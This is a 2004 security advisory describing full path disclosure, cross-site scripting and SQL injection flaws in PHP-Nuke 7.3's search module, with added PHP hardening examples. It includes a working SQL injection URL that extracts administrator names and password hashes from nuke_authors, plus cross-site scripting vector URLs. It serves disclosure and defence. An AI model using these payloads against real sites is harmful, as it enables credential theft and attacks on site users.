[UNIX] PHPNuke Multiple Vulnerabilities in Search Module
From: SecuriTeam (support_at_securiteam.com)
Date: 07/22/04
To: list@securiteam.com Date: 22 Jul 2004 18:19:37 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
PHPNuke Multiple Vulnerabilities in Search Module
------------------------------------------------------------------------
SUMMARY
"PHP-Nuke (http://www.phpnuke.org/) is a news automated system specially
designed to be used in Intranets and Internet. The Administrator has total
control of his web site, registered users, and he will have in the hand a
powerful assembly of tools to maintain an active and 100% interactive web
site using databases."
The well-known content management system suffers from a variety of
vulnerabilities in its search module, among them full path disclosure,
cross-site scripting and SQL injection, located in multiple places
throughout the code.
DETAILS
Vulnerable Systems:
* PHPNuke version 7.3
Full Path Disclosure:
The following examples demonstrate how it is possible to extract the path
to the scripts on the server. The vulnerability exists in the
"/modules/Search/index.php" script. When navigating to the search page,
which is usually located at the following URL:
http://localhost/nuke73/modules.php?name=Search
and entering characters that are invalid in a regular expression, such as
a doubled asterisk and/or a plus sign, the response received is:
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 228
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 232
Warning: eregi(): REG_BADRPT: in
D:\apache_wwwroot\nuke73\modules\Search\index.php on line 235
These are standard PHP warnings, and they reveal the full path to the
scripts. It is important to note that any system written in PHP should
filter such characters so that standard PHP error messages are not
generated.
Cross-Site Scripting:
In the search module script "/modules/Search/index.php", the variable $sid
allows cross-site scripting, like so:
http://localhost/nuke73/modules.php?name=Search&sid=[xss code here]
The user-submitted variable $max is also a cross-site scripting vector,
but only if the number of search results is 9 or greater:
http://localhost/nuke73/modules.php?name=Search&query=*&max=[xss code here]
The $sel1 to $sel5 variables are uninitialized and may yield a
cross-site scripting vulnerability:
http://localhost/nuke73/modules.php?name=Search&query=waraxe&sel1=[xss code here]&type=comments
In the same fashion, the $match variable is uninitialized:
http://localhost/nuke73/modules.php?name=Search&a=6&query=*&match=[xss code here]
Finally, the $mod1 to $mod3 variables are also uninitialized:
http://www.nukecops.com/modules.php?name=Search&query=*&mod3=[xss code here]
The only caveat to this last XSS issue is that the specified module must
be disabled for the attack to succeed.
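The defensive counterpart to the full path disclosure and cross-site scripting findings above, as an added example that is not PHP-Nuke's own code: the search parameters are read from the request explicitly with fixed defaults and integer casts, reflected values are encoded on output, and the search text is quoted before it is used as a pattern. The function names, the list of accepted search types and which parameters are treated as numeric are this example's assumptions.

```php
<?php
// Added example, not PHP-Nuke's own code.  Function names, the list of
// search types and which parameters are numeric are this example's
// assumptions; the parameter names are the ones the advisory lists.

// Read every Search-module input from $_GET explicitly.  With
// register_globals, a parameter that index.php never assigns ($sid, $max,
// $sel1..$sel5, $match, $mod1..$mod3) takes whatever value the request
// carries; here each one starts from a fixed default.
function search_params(array $get): array
{
    $p = [
        'query' => (string) ($get['query'] ?? ''),
        'sid'   => (int) ($get['sid'] ?? 0),            // "sid=<script>" becomes 0
        'min'   => max(0, (int) ($get['min'] ?? 0)),    // used in LIMIT, so int only
        'max'   => max(1, (int) ($get['max'] ?? 10)),
    ];
    $types     = ['stories', 'comments'];               // extend with the module's other types
    $p['type'] = in_array($get['type'] ?? '', $types, true) ? $get['type'] : 'stories';
    foreach (['match', 'sel1', 'sel2', 'sel3', 'sel4', 'sel5', 'mod1', 'mod2', 'mod3'] as $name) {
        $p[$name] = (string) ($get[$name] ?? '');      // initialised here, encoded on output
    }
    return $p;
}

// Every reflected value goes through this on output, so the string values
// that survive (query, match, sel*, mod*) cannot inject markup.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// The path disclosure came from eregi() compiling the search text as a
// pattern: "**" or a leading "+" is a bad repetition (REG_BADRPT), and the
// resulting warning printed the script's absolute path.  Quoting the text
// makes it a literal match, so the pattern can never fail to compile.
// (eregi() was removed in PHP 7, so preg_match() is used here.)
function search_text_matches(string $needle, string $haystack): bool
{
    if ($needle === '') {
        return false;
    }
    return preg_match('/' . preg_quote($needle, '/') . '/i', $haystack) === 1;
}
```

Independently of the input handling, setting display_errors=Off in php.ini keeps any remaining PHP warning, and the absolute path it carries, out of the HTTP response.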
SQL Injection:
The first SQL injection vulnerability is a non-critical one in
"/modules/Search/index.php". The injection is possible because the
unsanitized, user-submitted $min variable is used directly in an SQL
query. The variable is used after the ORDER BY or LIMIT SQL constructs and
poses no significant threat on MySQL version 4.0 and earlier. However, the
relatively newer 4.1 version of MySQL supports subselects, which makes this
vulnerability a major issue since a subselect can be appended after the
ORDER BY / LIMIT clauses.
The second SQL injection gives the attacker much more room to operate.
Looking at the original code:
$query = addslashes($query);
if ($type=="stories" OR !$type)
{
    if ($category > 0)
    {
        $categ = "AND catid='$category' ";
    }
    elseif ($category == 0)
    {
        $categ = "";
    }
    // no "else" branch: for $category < 0, $categ is never assigned here
    $q = "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext,
          a.url, s.comments, s.topic from ".$prefix."_stories s, ".$prefix."_authors a
          where s.aid=a.aid $queryalang $categ";
    if (isset($query)) $q .= "AND (s.title LIKE '%$query%' OR s.hometext LIKE '%$query%'
          OR s.bodytext LIKE '%$query%' OR s.notes LIKE '%$query%') ";
    if ($author != "") $q .= "AND s.aid='$author' ";
    if ($topic != "") $q .= "AND s.topic='$topic' ";
    if ($days != "" && $days!=0) $q .= "AND TO_DAYS(NOW()) - TO_DAYS(time) <= '$days' ";
    $q .= " ORDER BY s.time DESC LIMIT $min,$offset";  // $min is used unquoted and uncast here
    $t = $topic;
    $result5 = $db->sql_query($q);
    // (remainder of the branch not shown in the advisory)
}
The code shown presents a problem because the "if/elseif" block has no
final "else" branch. This opens up the possibility of setting the
$category variable to a value less than 0, which leaves $categ an
uninitialized variable that a request parameter of the same name can then
populate, allowing SQL commands to be inserted through it. The following
example demonstrates how to perform this:
http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1&categ= and 1=2 UNION SELECT 0,0,aid,pwd,0,0,0,0,0,0 from nuke_authors/*
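The stories branch rebuilt with the missing initialisation, as an added example that is not PHP-Nuke's own code: $categ gets a value for every $category, the free-text values go through an escaping callable, and the LIMIT operands are cast to integers (which also closes the $min issue from the first finding). The function name, the $p input array and the $escape callable are this example's assumptions; the $queryalang fragment of the original is left out.

```php
<?php
// Added example, not PHP-Nuke's own code: the stories branch of the search
// query rebuilt so that $categ is always assigned before the query is built.
// The function name, the $p array and the $escape callable are this
// example's assumptions; $prefix and the column names follow the advisory.

function build_stories_query(string $prefix, array $p, callable $escape): string
{
    // The original only assigned $categ for $category > 0 or == 0, so a
    // request with category=-1 left it unset and a "categ=..." parameter
    // supplied it.  A single assignment covers every value of $category.
    $category = (int) ($p['category'] ?? 0);        // "-1 UNION ..." becomes -1
    $categ = ($category > 0) ? "AND catid='$category' " : '';

    $conds = [];
    if (($p['query'] ?? '') !== '') {
        $q = $escape($p['query']);
        $conds[] = "(s.title LIKE '%$q%' OR s.hometext LIKE '%$q%'"
                 . " OR s.bodytext LIKE '%$q%' OR s.notes LIKE '%$q%')";
    }
    if (($p['author'] ?? '') !== '') {
        $conds[] = "s.aid='" . $escape($p['author']) . "'";
    }
    if (($p['topic'] ?? '') !== '') {
        $conds[] = "s.topic='" . (int) $p['topic'] . "'";
    }
    $days = (int) ($p['days'] ?? 0);
    if ($days > 0) {
        $conds[] = "TO_DAYS(NOW()) - TO_DAYS(s.time) <= $days";
    }

    // $min and $offset reach LIMIT as integers only.  Quoting does not help
    // there, and on MySQL 4.1 an uncast $min could carry a subselect.
    $min    = max(0, (int) ($p['min'] ?? 0));
    $offset = max(1, (int) ($p['offset'] ?? 10));

    $sql = "SELECT s.sid, s.aid, s.informant, s.title, s.time, s.hometext,"
         . " s.bodytext, a.url, s.comments, s.topic"
         . " FROM {$prefix}_stories s, {$prefix}_authors a"
         . " WHERE s.aid=a.aid $categ";
    foreach ($conds as $c) {
        $sql .= "AND $c ";
    }
    return $sql . "ORDER BY s.time DESC LIMIT $min,$offset";
}

// Constructed input mirroring the advisory's request: category=-1 now yields an empty $categ
// and the stray "categ" parameter is never read.
$sql = build_stories_query('nuke', ['query' => 'f00bar', 'category' => '-1', 'categ' => 'ignored'], 'addslashes');
```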
ADDITIONAL INFORMATION
The information has been provided by Janek Vind (come2waraxe@yahoo.com).